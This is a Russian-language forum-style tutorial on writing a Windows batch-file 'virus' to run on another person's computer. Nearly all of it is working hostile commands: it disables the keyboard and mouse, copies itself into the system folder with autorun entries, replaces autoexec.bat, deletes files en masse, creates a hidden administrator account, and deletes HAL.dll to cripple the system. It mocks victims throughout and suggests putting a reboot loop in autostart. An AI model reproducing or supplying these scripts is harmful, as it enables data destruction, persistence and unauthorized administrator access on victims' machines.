Для написания нам понадобится обыкновенный блокнот (пк). 1. пишем любое название блокнота(install.bat), главное чтобы Вы поставили расширение *.bat. 2. запускаем блокнот. 3. Теперь пишим в нем команды которые батик будет выполнять на чужом кампе, помните все команды он делает последовательно.
1)@echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт. 2)rundll32 keyboard,disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C 3) rundll32 mouse,disable - Отключаем мышь тоже на всякий. 4) copy %0 %windir%/system - Копируемся в папку windows/system 5)// %0 - Переменная, указывающая на исходный файл-вирус // %windir% - переменная папка масдая. echo run=%windir%/system/*.bat >> %windir%\win.ini - Добавляет текст "run=%windir%/system/*.bat" в файл win.ini 6) echo run=%windir%/system/*.bat >> %windir%\system.ini - Добавляет текст "run=%windir%/system/*.bat" в файл system.ini 7) label LOHOLAMMER - Меняет имя диску c:\ на "LOHOLAMMER" 8) if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем //у него атрибуты -h -s -a -r 9) deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat, если не убрать атрибуты, то программа не удалит файл. 10) echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat - Добавить текст "YOU ARE LAMMER...xe-xe-xe" //в новый файл autoexec.bat 11) rundll32 mouse,enable - Включаем, пускай думает, что ниче не было. 12)rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было. 13) echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью deltree /y %temp%\mes.js //А потом стирает за собой следы. 14) attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил. 15) pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.) 16)«copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat); 17)«label x:y» - переименовывает диск x на имя y (пример label C:Disc error); 18)«time х:у» - меняет время на х часов и у минут (пример time 14:27); 19)«date x.y.z» - меняет дату на x день, y месяц, z год (пример date 16.11.05); 20)«md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka); 21)«del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок); 22)«del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q); 23)«assoc.х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc.exe=.mp3); 24)«net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off chcp 1251 net user SUPPORT_388945a0 /delete net user hacker hack /add net localgroup Администраторы hacker /add net localgroup Пользователи SUPPORT_388945a0 /del reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer
Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton
Удаляет ядро системы
del %systemroot%\system32\HAL.dll
ВРОДЕ ЭТО ВСЕ БЕЗОБИДНО НО ДОПУСТИМ МОЖНО ПЕРЕЗАГРУЗКУ ПОСТАВИТЬ В АВТОЗАПУСК!!!)))
